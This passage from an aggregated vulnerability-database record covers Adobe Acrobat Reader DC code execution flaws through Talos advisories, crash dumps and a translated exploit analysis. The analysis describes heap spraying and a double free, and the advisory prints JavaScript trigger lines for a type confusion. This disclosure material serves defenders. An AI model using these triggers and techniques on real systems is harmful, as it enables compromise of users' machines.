C:\\Windows\\system32\\RPCRT4.dll\r\nModLoad: 75a40000 75a97000 C:\\Windows\\system32\\SHLWAPI.dll\r\n(8b0.3f8): Break instruction exception - code 80000003 (first chance)\r\neax=00000000 ebx=00000000 ecx=001bf42c edx=771f6c74 esi=fffffffe edi=00000000\r\neip=772505d9 esp=001bf448 ebp=001bf474 iopl=0 nv up ei pl zr na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246\r\nntdll!LdrpDoDebuggerBreak+0x2c:\r\n772505d9 cc int 3\r\n0:000> g\r\nModLoad: 75e60000 75e7f000 
C:\\Windows\\system32\\IMM32.DLL\r\nModLoad: 753f0000 753f6000 C:\\Windows\\system32\\NSI.dll\r\n(8b0.3f8): C++ EH exception - code e06d7363 (first chance)\r\nModLoad: 74f60000 74fac000 C:\\Windows\\system32\\apphelp.dll\r\nModLoad: 64a70000 64ac1000 c:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\sqlite.dll\r\n(8b0.3f8): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=046503d8 ebx=00000000 ecx=046503d8 edx=06672fc8 esi=03f75478 edi=0656ffe8\r\neip=41414141 esp=001bc14c ebp=001bc174 iopl=0 nv up ei pl nz na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206\r\n41414141 ?? ???\r\n```\r\n\r\n### Crash Information\r\nCrash output with PageHeap enabled:\r\n```\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\n*** WARNING: Unable to verify checksum for c:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\plug_ins\\Annots.api\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for c:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\plug_ins\\Annots.api -\r\neax=011716ce ebx=00000002 ecx=011716cc edx=011716cc esi=00000002 edi=37561000\r\neip=6326f26d esp=0016c6f0 ebp=0016c71c iopl=0 nv up ei pl nz ac po cy\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210213\r\nMSVCR120!memcpy+0x2a:\r\n6326f26d f3a4 rep movs byte ptr es:[edi],byte ptr [esi]\r\n0:000> k\r\nChildEBP RetAddr\r\n0016c6f4 7748e62e MSVCR120!memcpy+0x2a\r\nWARNING: Stack unwind information not available. 
Following frames may be wrong.\r\n0016c71c 7748e5a2 Annots!PlugInMain+0xa72d\r\n0016c744 7748e3c6 Annots!PlugInMain+0xa6a1\r\n0016c754 776412e1 Annots!PlugInMain+0xa4c5\r\n0016c764 774f7258 Annots!PlugInMain+0x1bd3e0\r\n*** WARNING: Unable to verify checksum for c:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\plug_ins\\EScript.api\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for c:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\plug_ins\\EScript.api -\r\n0016c790 515bd6b2 Annots!PlugInMain+0x73357\r\n0016c800 515c1c35 EScript!mozilla::HashBytes+0x2d050\r\n0016c830 5159387b EScript!mozilla::HashBytes+0x315d3\r\n0016c8c0 515932df EScript!mozilla::HashBytes+0x3219\r\n0016c8dc 515bd21d EScript!mozilla::HashBytes+0x2c7d\r\n0016c928 515bd1b0 EScript!mozilla::HashBytes+0x2cbbb\r\n0016c944 515c1a3e EScript!mozilla::HashBytes+0x2cb4e\r\n0016c960 515c19d5 EScript!mozilla::HashBytes+0x313dc\r\n0016c990 515db61f EScript!mozilla::HashBytes+0x31373\r\n0016c9e4 515db51f EScript!mozilla::HashBytes+0x4afbd\r\n0016c9fc 7763d6c7 EScript!mozilla::HashBytes+0x4aebd\r\n0016ca3c 774a5069 Annots!PlugInMain+0x1b97c6\r\n0016ca5c 774a4f71 Annots!PlugInMain+0x21168\r\n0016ca9c 7763d663 Annots!PlugInMain+0x21070\r\n0016cadc 774a5069 Annots!PlugInMain+0x1b9762\r\n0016cafc 7763d75e Annots!PlugInMain+0x21168\r\n0016cb2c 515db634 Annots!PlugInMain+0x1b985d\r\n```\r\n\r\n### Timeline\r\n* 2018-01-23 - Vendor Disclosure\r\n* 2018-05-15 - Public Release", "published": "2018-05-17T00:00:00", "type": "seebug", "title": "Adobe Acrobat Reader DC ANFancyAlertImpl Remote Code Execution Vulnerability(CVE-2018-4947)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-4947"], "modified": "2018-05-17T00:00:00", "id": "SSV:97294", "href": "https://www.seebug.org/vuldb/ssvid-97294", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": ""}], "talosblog": [{"lastseen": "2018-05-15T21:13:57", "bulletinFamily": "blog", "cvelist": ["CVE-2018-4947", 
"CVE-2018-4996"], "description": "_Discovered by Aleksandar Nikolic of Cisco Talos_ \n \n_Update 05/15/18_: The CVE for TALOS-2018-0517 has been corrected below. \n\n\n## Overview\n\n \nToday, Talos is releasing details of new vulnerabilities within Adobe Acrobat Reader DC. Adobe Acrobat Reader is the most popular and most feature-rich PDF reader. It has a big user base, is usually a default PDF reader on systems and integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger this vulnerability. \n \nA specific JavaScript script embedded in a PDF file can cause the document ID field to be used in an unbounded copy operation, leading to a stack-based buffer overflow when opening a specially crafted PDF document in Adobe Acrobat Reader DC 2018.009.20044. This stack overflow can lead to a return address overwrite, which can result in arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page. \n \n\n\n### TALOS-2018-0517 - Adobe Acrobat Reader DC Net.Discovery.queryServices Remote Code Execution Vulnerability (CVE-2018-4996)\n\n \nA specific JavaScript script embedded in a PDF file can cause a pointer to a previously freed object to be reused when opening a PDF document in Adobe Acrobat Reader DC 2018.009.20044. With careful memory manipulation, this can potentially lead to sensitive memory disclosure or arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page. Detailed vulnerability information can be found [here](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0517>). 
\n \n\n\n### TALOS-2018-0518 - Adobe Acrobat Reader DC ANFancyAlertImpl Remote Code Execution Vulnerability (CVE-2018-4947)\n\n \nA specific JavaScript script embedded in a PDF file can cause a pointer to a previously freed object to be reused when opening a PDF document in Adobe Acrobat Reader DC 2018.009.20044. With careful memory manipulation, this can potentially lead to sensitive memory disclosure or arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page. Detailed vulnerability information can be found [here](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0518>). \n \n\n\n## Known vulnerable versions\n\n \nAdobe Acrobat Reader DC 2018.009.20044 \n \n\n\n## Coverage\n\n \nThe following Snort Rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org. \n \nSnort Rules: 45506-45507, 45521-45522 \n \n\n\n[](<http://feeds.feedburner.com/~ff/feedburner/Talos?a=wlCWZuun2rs:EsJhBSnRcIM:yIl2AUoC8zA>)\n\n", "modified": "2018-05-15T20:38:52", "published": "2018-05-15T06:51:00", "id": "TALOSBLOG:C087C65FAEEB57D382F9DD6FD51D549C", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/wlCWZuun2rs/multiple-acrobat-reader-vulns.html", "type": "talosblog", "title": "Vulnerability Spotlight: Multiple Adobe Acrobat Reader DC Vulnerabilities", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-07-10T22:29:40", "bulletinFamily": "blog", "cvelist": ["CVE-2018-12756", "CVE-2018-12812", "CVE-2018-12815"], "description": "_Discovered by Aleksandar Nikolic of Cisco Talos_ \n\n\n### Overview\n\nToday, Talos is releasing details of new vulnerabilities within Adobe Acrobat Reader DC. 
Adobe Acrobat Reader is the most popular and most feature-rich PDF reader. It has a big user base, is usually a default PDF reader on systems and integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger these vulnerabilities. \n\n\n### TALOS-2018-0569 - Adobe Acrobat Reader DC Collab.drivers Remote Code Execution Vulnerability (CVE-2018-12812)\n\n \n \nSpecific JavaScript code embedded in a PDF file can lead to an object type confusion when opening a PDF document in Adobe Acrobat Reader DC 2018.011.20038. With careful memory manipulation, this can lead to arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page. Detailed vulnerability information can be found [here](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0569>). \n\n\n### TALOS-2018-0590 - Adobe Acrobat Reader DC Collab newWrStreamToCosObj Remote Code Execution Vulnerability (CVE-2018-12756)\n\nSpecific JavaScript code embedded in a PDF file can lead to an object type confusion when opening a PDF document in Adobe Acrobat Reader DC 2018.011.20038. With careful memory manipulation, this can lead to arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page. Detailed vulnerability information can be found [here](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0590>). \n\n\n### TALOS-2018-0592 - Adobe Acrobat Reader DC JSON Stringify Remote Code Execution Vulnerability (CVE-2018-12815)\n\nSpecific JavaScript code embedded in a PDF file can lead to a use-after-free condition when opening a PDF document in Adobe Acrobat Reader DC 2018.011.20038. With careful memory manipulation, this can lead to arbitrary code execution. 
In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page. Detailed vulnerability information can be found [here](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0592>). \n \n\n\n#### Known vulnerable versions\n\nAdobe Acrobat Reader DC 2018.011.20038 \n \n\n\n[](<http://3.bp.blogspot.com/-_gx-CKXcM6s/W0UVE0O4z4I/AAAAAAAADNk/teef_5aO8I4kCho5FRErk5-UUdZIHCM9ACK4BGAYYCw/s1600/patch_availability_available.jpg>)\n\n### Coverage\n\nThe following Snort Rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org. \n \nSnort Rules: 46292-46293, 46550-46551, 46634-46635 \n \n\n\n", "modified": "2018-07-10T20:20:40", "published": "2018-07-10T10:31:00", "id": "TALOSBLOG:E89C3607ED6143C88E65B06729E1F294", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/XPxo44xwpZM/vuln-spotlight-adobe-reader.html", "type": "talosblog", "title": "Vulnerability Spotlight: Multiple Adobe Acrobat DC Remote Code Execution Vulnerabilties", "cvss": {"score": 0.0, "vector": "NONE"}}], "myhack58": [{"lastseen": "2018-06-01T15:53:41", "bulletinFamily": "info", "cvelist": ["CVE-2018-4990", "CVE-2018-8120"], "description": "On May 15, 2018, ESET released the article \u201cA tale of two zero-days\u201d, which disclosed that in March of this year ESET captured, on the malware scan engine VirusTotal, a PDF document used for attack testing. The PDF sample contains two 0-day vulnerabilities, CVE-2018-4990 and CVE-2018-8120, which are used to achieve arbitrary code execution against the Adobe Acrobat/Reader PDF reader. 
Of these, CVE-2018-4990 is a code execution vulnerability in the Adobe PDF reader, and CVE-2018-8120 is a privilege-escalation vulnerability in the Windows operating system Win32k kernel; once code execution is obtained, the kernel privilege-escalation vulnerability is used to bypass the Adobe PDF reader's sandbox protection and achieve arbitrary code execution. \nVulnerability the use of backtracking analysis \nAnalysis by 360 Threat Intelligence Center confirmed that the disclosed vulnerabilities can be exploited. In this article we attempt a detailed analysis, using the public POC sample, of how the Adobe Acrobat/Reader code execution vulnerability CVE-2018-4990 is exploited, and record the entire analysis process. Please forgive any errors in the analysis. \nAnalysis of the environment \n[Operating system](<http://www.myhack58.com/Article/48/Article_048_1.htm>): Windows 7 SP1 \nAdobeReader DC: 1700920044 \nSample MD5: bd23ad33accef14684d42c32769092a0 \nPayload function parses \nUse PDFStream open vulnerability of the sample, in the tail can be found to Use JavaScript to trigger the use of the vulnerability: \n! [](/Article/UploadPic/2018-6/201861173548288. png? www. myhack58. com) \nThrough the analysis shows that the JavaScript in the front into PDF reader vulnerability is triggered after the load operation of the load, mainly used to provide the right and execute malicious code. And after the JavaScript code through the two Array instance sprayarr and a1 to achieve memory Spray layout, it should be noted that a1 is the Array in the odd-subscript of the element were released, this is the UAF class exploits a common memory layout techniques: a \n! [](/Article/UploadPic/2018-6/201861173548377. png? www. myhack58. com) \nMemory deployment is successful, then in myfun1 and myfun2 called twice to trigger a double free of the script, the script code to trigger a double free, which leads to subsequent code is executed, trigger a double free of the script: \nvarf1 = this. 
getField(\"Button1\"); \nFinally, the array instance sprayarr2 assignment, each element is a length of 0\u00d720000-0\u00d724 ArrayBuffer, and then traverse the sprayarr can be found which corresponds to a sprayarr the element length is modified to 0\u00d720000-0\u00d724 the default length is 0\u00d710000-0\u00d724\uff09, this time through ultra-long sprayarr[i1]can be modified adjacent the sprayarr[i1+1]object len length of the attribute, from which script code can be seen in length is modified to 0\u00d766666666, and ultimately through the long sprayarr[i1+1]can achieve full memory read and write: a \n! [](/Article/UploadPic/2018-6/201861173548237. png? www. myhack58. com) \nFor this the attacker has prepared a special use of ultra-long sprayarr the object to achieve full memory read and write function: \n! [](/Article/UploadPic/2018-6/201861173548144. png? www. myhack58. com) \nTo obtain a full memory reading and writing, the POC, through forged bookmarkRoot object to achieve code execution: \n! [](/Article/UploadPic/2018-6/201861173549831. png? www. myhack58. com) \nPOC running the following will cause the crash: \n! [](/Article/UploadPic/2018-6/201861173549562. png? www. myhack58. com) \nCollapse of the reasons for the objecscript address is hard-coded, wherein the 0x23A59BA4-0\u00d723800000 address is not adapted to test the Adobe Reader version, causing the crash: \n! [](/Article/UploadPic/2018-6/201861173549851. png? www. myhack58. com) \nThrough the POC Payload function analysis, we have identified a POC in a few need to analyze the main points, it is also figuring out the whole exploit key: \nl sprayarr, a1 in the memory spray memory structure \nl trigger the double free of code specific analysis var f1 = this. 
getField(\"Button1\");\uff09 \nl sprayarr2 initialization of the memory state, the initial of each element length is just sprayarr super long element length, this lets us suspect that sprayarr2 and a sprayarr coincide, perhaps a second point code in the sprayarr a element release? Then sprayarr2 reuse it?\uff09 \nScript analysis and debug \nWith a Payload function analysis derived the exploits of the key points we began one by one for debugging analysis. \nHow to analyze the associated memory structure \nSample specific vulnerability trigger/use parts are the JavaScript, and therefore to debug when we can rely on the corresponding trigonometric function to achieve a specific interrupt. In order to obtain the corresponding memory structure, we can directly modify the corresponding POC, such as POC, create an Array of instances of myContent, the Array in the 0th element assigned the value of 0x1a2c3d4f, in order to facilitate memory search, respectively, after the We are interested in variable assign a value to the Array can be easily positioned memory for analysis: \n! [](/Article/UploadPic/2018-6/201861173549861. png? www. myhack58. com) \nBy the above-described trigonometric function off, this time by the search 0x1a2c3d4f can be found in the corresponding myContent structure, as shown in the address 0x062035f8 the start of the data for the corresponding tag for 0x1a2c3d4f, after the four-byte value 0xffffff81 mark the element of the type type, and then the next turn we assigned the value of the element, as are the Array, so the type are 0xffffff87: the \n! [](/Article/UploadPic/2018-6/201861173549846. png? www. myhack58. 
com)\n\n**[1] [[2]](<90341_2.htm>) [[3]](<90341_3.htm>) [[4]](<90341_4.htm>) [[5]](<90341_5.htm>) [next](<90341_2.htm>)**\n", "edition": 1, "modified": "2018-06-01T00:00:00", "published": "2018-06-01T00:00:00", "id": "MYHACK58:62201890341", "href": "http://www.myhack58.com/Article/html/3/62/2018/90341.htm", "title": "CVE-2018-4990 Adobe Reader code execution exploit analysis-exploit warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}], "talos": [{"lastseen": "2020-07-01T21:25:07", "bulletinFamily": "info", "cvelist": ["CVE-2018-12812"], "description": "# Talos Vulnerability Report\n\n### TALOS-2018-0569\n\n## Adobe Acrobat Reader DC Collab.drivers Remote Code Execution Vulnerability\n\n##### July 10, 2018\n\n##### CVE Number\n\nCVE-2018-12812\n\n### Summary\n\nA specific JavaScript code embedded in a PDF file can lead to an object type confusion when opening a PDF document in Adobe Acrobat Reader DC 2018.011.20038. With careful memory manipulation, this can lead to arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page.\n\n### Tested Versions\n\nAdobe Acrobat Reader DC 2018.011.20038\n\n### Product URLs\n\n<https://get.adobe.com/reader/>\n\n### CVSSv3 Score\n\n6.8 - CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-843: Access of Resource Using Incompatible Type (\u2018Type Confusion\u2019)\n\n### Details\n\nAdobe Acrobat Reader is the most popular and most feature-rich PDF reader. It has a large user base, is usually a default PDF reader on systems and integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger this vulnerability. 
The one method call required to trigger this vulnerability is privileged, and can only be called from trusted functions or from a trusted location.\n\nAdobe Acrobat Reader DC supports embedded JavaScript code in the PDF to allow for interactive PDF forms. This gives the potential attacker the ability to precisely control memory layout, and poses an additional attack surface.\n\nWhile executing the following piece of JavaScript code, a specific condition leading to an object of the wrong type being misinterpreted can cause memory corruption (it should be noted that all three of these lines require higher privileges, meaning they must be executed in a trusted PDF file):\n \n \n this.event = this.Collab.drivers[0]; \n this.InitializeFormsTrackerJS( );\n this.Collab.drivers[0].getWorkspaceCreator(null, this); \n \n\nAfter calling `InitializeFormsTrackerJS`, which is an undocumented JavaScript function, a subsequent dereference of `this.Collab.drivers[0]` with a call to a particular method will cause one extra object of the wrong type to be accessed. After a call to `getWorkspaceCreator`, in the debugger, we actually end up in the following code:\n \n \n Breakpoint 0 hit\n eax=17dd3000 ebx=00000000 ecx=59c715e4 edx=59c715e4 esi=24cdf000 edi=36dbf000\n eip=5779757c esp=0023c754 ebp=0023c77c iopl=0 nv up ei pl nz na pe nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200206\n Annots!PlugInMain+0x7367b:\n 5779757c ff90cc000000 call dword ptr [eax+0CCh] ds:0023:17dd30cc=57f27398\n 0:000> k\n # ChildEBP RetAddr \n WARNING: Stack unwind information not available. 
Following frames may be wrong.\n 00 0023c77c 59b0d6ca Annots!PlugInMain+0x7367b\n 01 0023c7ec 59b11c50 EScript!mozilla::HashBytes+0x2d054\n 02 0023c81c 59ae388f EScript!mozilla::HashBytes+0x315da\n 03 0023c8ac 59ae32f3 EScript!mozilla::HashBytes+0x3219\n 04 0023c8c8 59b0d235 EScript!mozilla::HashBytes+0x2c7d\n 05 0023c914 59b0d1c8 EScript!mozilla::HashBytes+0x2cbbf\n 06 0023c930 59b11a59 EScript!mozilla::HashBytes+0x2cb52\n 07 0023c94c 59b119f0 EScript!mozilla::HashBytes+0x313e3\n 08 0023c97c 59b2b605 EScript!mozilla::HashBytes+0x3137a\n 09 0023c9d0 59b2b505 EScript!mozilla::HashBytes+0x4af8f\n 0a 0023c9e8 578dd779 EScript!mozilla::HashBytes+0x4ae8f\n 0b 0023ca28 5774506e Annots!PlugInMain+0x1b9878\n 0c 0023ca48 57744f76 Annots!PlugInMain+0x2116d\n 0d 0023ca88 578dd715 Annots!PlugInMain+0x21075\n 0e 0023cac8 5774506e Annots!PlugInMain+0x1b9814\n 0f 0023cae8 578dd7b9 Annots!PlugInMain+0x2116d\n 10 0023cb00 59b2b61a Annots!PlugInMain+0x1b98b8\n 11 0023cb50 59b2b505 EScript!mozilla::HashBytes+0x4afa4\n 12 0023cb68 578dd779 EScript!mozilla::HashBytes+0x4ae8f\n \n\nAt this call, EScript\u2019s cachehash will be consulted, and an object returned as a result. 
Because things don\u2019t change over many calls of the above code, we can get the resulting pointer in advance:\n \n \n 0:000> dd poi(poi(poi(poi(esp)+0x10)+0x34)+4)\n 33046000 57b38810 00000000 337fd000 ffffffff\n 33046010 33803000 ffffffff 00000000 57b3908c\n 33046020 00000000 57b08984 00000000 57b39148\n 33046030 00000000 337f1000 ffffffff 00000000\n 33046040 00000000 00000000 00000000 00000000\n 33046050 00000000 00000000 00000000 00000000\n 33046060 00000000 00000000 00000000 00000000\n 33046070 57b0877c 00000000 00000000 00000000\n \n\nAnd indeed, if we wait for the above call to return, we see the same result in the `eax`:\n \n \n 0:000> p\n eax=33046000 ebx=00000000 ecx=57b0a370 edx=57b0a378 esi=24cdf000 edi=36dbf000\n eip=57797582 esp=0023c754 ebp=0023c77c iopl=0 nv up ei pl nz na pe nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200206\n Annots!PlugInMain+0x73681:\n 57797582 59 pop ecx\n 0:000> dd eax\n 33046000 57b38810 00000000 337fd000 ffffffff\n 33046010 33803000 ffffffff 00000000 57b3908c\n 33046020 00000000 57b08984 00000000 57b39148\n 33046030 00000000 337f1000 ffffffff 00000000\n 33046040 00000000 00000000 00000000 00000000\n 33046050 00000000 00000000 00000000 00000000\n 33046060 00000000 00000000 00000000 00000000\n 33046070 57b0877c 00000000 00000000 00000000\n \n\nLooking up heap information of this pointer reveals the following:\n \n \n 0:000> !heap -p -a 33046000 \n address 33046000 found in\n _DPH_HEAP_ROOT @ 1241000\n in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)\n 331b064c: 33046000 108 - 33045000 2000\n ? 
Annots!PlugInMain+41490f\n 66818e89 verifier!AVrfDebugPageHeapAllocate+0x00000229\n 77756206 ntdll!RtlDebugAllocateHeap+0x00000030\n 7771a127 ntdll!RtlpAllocateHeap+0x000000c4\n 776e5950 ntdll!RtlAllocateHeap+0x0000023a\n 5cdced43 MSVCR120!malloc+0x00000049 [f:\\dd\\vctools\\crt\\crtw32\\heap\\malloc.c @ 92]\n 57728b12 Annots!PlugInMain+0x00004c11\n 57728ac1 Annots!PlugInMain+0x00004bc0\n 577441c7 Annots!PlugInMain+0x000202c6\n 57744170 Annots!PlugInMain+0x0002026f\n 59b225d3 EScript!mozilla::HashBytes+0x00041f5d\n 59b075ce EScript!mozilla::HashBytes+0x00026f58\n 59b017da EScript!mozilla::HashBytes+0x00021164\n 59b00606 EScript!mozilla::HashBytes+0x0001ff90\n 59b00511 EScript!mozilla::HashBytes+0x0001fe9b\n 59b00458 EScript!mozilla::HashBytes+0x0001fde2\n 59ae9e2e EScript!mozilla::HashBytes+0x000097b8\n 59b285ec EScript!mozilla::HashBytes+0x00047f76\n 59b28370 EScript!mozilla::HashBytes+0x00047cfa\n 59b27de3 EScript!mozilla::HashBytes+0x0004776d\n 59b26cd5 EScript!mozilla::HashBytes+0x0004665f\n 59b96428 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0005f743\n 584dcb1e AcroRd32!AIDE::PixelPartInfo::operator=+0x000222ce\n 584d922c AcroRd32!AIDE::PixelPartInfo::operator=+0x0001e9dc\n 5832efca AcroRd32!AX_PDXlateToHostEx+0x0015a229\n 5832f4c8 AcroRd32!AX_PDXlateToHostEx+0x0015a727\n 584dc87b AcroRd32!AIDE::PixelPartInfo::operator=+0x0002202b\n 57fc5293 AcroRd32!PDAlternatesGetCosObj+0x0001ce03\n 57f8cb36 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x000bac25\n 57f040bc AcroRd32!CTJPEGWriter::CTJPEGWriter+0x000321ab\n 57f031ad AcroRd32!CTJPEGWriter::CTJPEGWriter+0x0003129c\n 57ee7a07 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00015af6\n 57ee6fbb AcroRd32!CTJPEGWriter::CTJPEGWriter+0x000150aa\n \n\nNote that it\u2019s an object of size 0x108. In the sample proof of concept there are total of 12 benign calls on the above break point, all returning an object of size 0x108 as a result. 
But, 13th call (which is a result of calling `InitializeFormsTrackerJS`) will be erroneous:\n \n \n eax=17dd3000 ebx=00000000 ecx=59c715e4 edx=59c715e4 esi=24cdf000 edi=332b7000\n eip=5779757c esp=0023c8d4 ebp=0023c8fc iopl=0 nv up ei pl nz na po nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202\n Annots!PlugInMain+0x7367b:\n 5779757c ff90cc000000 call dword ptr [eax+0CCh] ds:0023:17dd30cc=57f27398\n 0:000> k\n # ChildEBP RetAddr \n WARNING: Stack unwind information not available. Following frames may be wrong.\n 00 0023c8fc 59b0d6ca Annots!PlugInMain+0x7367b\n 01 0023c96c 59b11c50 EScript!mozilla::HashBytes+0x2d054\n 02 0023c99c 59ae388f EScript!mozilla::HashBytes+0x315da\n 03 0023ca2c 59ae32f3 EScript!mozilla::HashBytes+0x3219\n 04 0023ca48 59b0d235 EScript!mozilla::HashBytes+0x2c7d\n 05 0023ca94 59b0d1c8 EScript!mozilla::HashBytes+0x2cbbf\n 06 0023cab0 59b11a59 EScript!mozilla::HashBytes+0x2cb52\n 07 0023cacc 59b119f0 EScript!mozilla::HashBytes+0x313e3\n 08 0023cafc 59b2b605 EScript!mozilla::HashBytes+0x3137a\n 09 0023cb50 59b2b505 EScript!mozilla::HashBytes+0x4af8f\n 0a 0023cb68 578dd779 EScript!mozilla::HashBytes+0x4ae8f\n 0b 0023cba8 5774506e Annots!PlugInMain+0x1b9878\n 0c 0023cbc8 578dd7b9 Annots!PlugInMain+0x2116d\n 0d 0023cbe0 59b2b61a Annots!PlugInMain+0x1b98b8\n 0e 0023cc30 59b2b505 EScript!mozilla::HashBytes+0x4afa4\n 0f 0023cc48 578dd779 EScript!mozilla::HashBytes+0x4ae8f\n 10 0023cc88 5774506e Annots!PlugInMain+0x1b9878\n 11 0023cca8 57744f76 Annots!PlugInMain+0x2116d\n 12 0023cce8 577958db Annots!PlugInMain+0x21075\n 13 0023cda8 59b225d3 Annots!PlugInMain+0x719da\n 14 0023ce20 59b075ce EScript!mozilla::HashBytes+0x41f5d\n 15 0023ce94 59b017da EScript!mozilla::HashBytes+0x26f58\n 16 0023d3ec 59b00606 EScript!mozilla::HashBytes+0x21164\n 17 0023d424 59b00511 EScript!mozilla::HashBytes+0x1ff90\n 18 0023d460 59b00458 EScript!mozilla::HashBytes+0x1fe9b\n 19 0023d490 59ae9e2e EScript!mozilla::HashBytes+0x1fde2\n 0:000> dd 
poi(poi(poi(poi(esp)+0x10)+0x34)+4)\n 2c2fb000 33b93000 00000000 33b93000 d0d0d0d0\n 2c2fb010 334e5000 00000000 00000003 d0d0d0d0\n 2c2fb020 00690074 006e006f d0d00000 d0d0d0d0\n 2c2fb030 72656b63 00000000 c0c0c0c0 c0c0c0c0\n 2c2fb040 00000000 00000000 00000000 00000000\n 2c2fb050 00000000 00000000 00000000 00000000\n 2c2fb060 00000000 00000000 00000000 00000000\n 2c2fb070 00000000 00000000 00000000 00000000\n 0:000> !heap -p -a poi(poi(poi(poi(esp)+0x10)+0x34)+4)\n address 2c2fb000 found in\n _DPH_HEAP_ROOT @ 1241000\n in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)\n 2c1b3e04: 2c2fb000 8 - 2c2fa000 2000\n 66818e89 verifier!AVrfDebugPageHeapAllocate+0x00000229\n 77756206 ntdll!RtlDebugAllocateHeap+0x00000030\n 7771a127 ntdll!RtlpAllocateHeap+0x000000c4\n 776e5950 ntdll!RtlAllocateHeap+0x0000023a\n 5cdced43 MSVCR120!malloc+0x00000049 [f:\\dd\\vctools\\crt\\crtw32\\heap\\malloc.c @ 92]\n 5cdcee1c MSVCR120!operator new+0x0000001d [f:\\dd\\vctools\\crt\\crtw32\\heap\\new.cpp @ 59]\n 5772dff6 Annots!PlugInMain+0x0000a0f5\n 5772daf9 Annots!PlugInMain+0x00009bf8\n 577290b0 Annots!PlugInMain+0x000051af\n 57737e59 Annots!PlugInMain+0x00013f58\n 5774506e Annots!PlugInMain+0x0002116d\n 578dd7b9 Annots!PlugInMain+0x001b98b8\n 59b2b61a EScript!mozilla::HashBytes+0x0004afa4\n 59b2b505 EScript!mozilla::HashBytes+0x0004ae8f\n 578dd779 Annots!PlugInMain+0x001b9878\n 5774506e Annots!PlugInMain+0x0002116d\n 57744f76 Annots!PlugInMain+0x00021075\n 577958db Annots!PlugInMain+0x000719da\n 59b225d3 EScript!mozilla::HashBytes+0x00041f5d\n 59b075ce EScript!mozilla::HashBytes+0x00026f58\n 59b017da EScript!mozilla::HashBytes+0x00021164\n 59b00606 EScript!mozilla::HashBytes+0x0001ff90\n 59b00511 EScript!mozilla::HashBytes+0x0001fe9b\n 59b00458 EScript!mozilla::HashBytes+0x0001fde2\n 59ae9e2e EScript!mozilla::HashBytes+0x000097b8\n 59b285ec EScript!mozilla::HashBytes+0x00047f76\n 59b28370 EScript!mozilla::HashBytes+0x00047cfa\n 59b27de3 
EScript!mozilla::HashBytes+0x0004776d\n 59b26cd5 EScript!mozilla::HashBytes+0x0004665f\n 59b96428 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0005f743\n 584dcb1e AcroRd32!AIDE::PixelPartInfo::operator=+0x000222ce\n 584d922c AcroRd32!AIDE::PixelPartInfo::operator=+0x0001e9dc\n \n\nIn the above debugging output we can see, even before the call is made, that the returned object pointer will point to an object of size 8 in this case (note that this is with full page heap enabled and the details might vary with memory layout). And indeed, after returning from this call, we have a wrong object in `eax`:\n \n \n 0:000> p\n eax=2c2fb000 ebx=00000000 ecx=57b0a370 edx=57b0a378 esi=24cdf000 edi=332b7000\n eip=57797582 esp=0023c8d4 ebp=0023c8fc iopl=0 nv up ei pl nz na pe nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206\n Annots!PlugInMain+0x73681:\n 57797582 59 pop ecx\n 0:000> dd eax\n 2c2fb000 33b93000 00000000 33b93000 d0d0d0d0\n 2c2fb010 334e5000 00000000 00000003 d0d0d0d0\n 2c2fb020 00690074 006e006f d0d00000 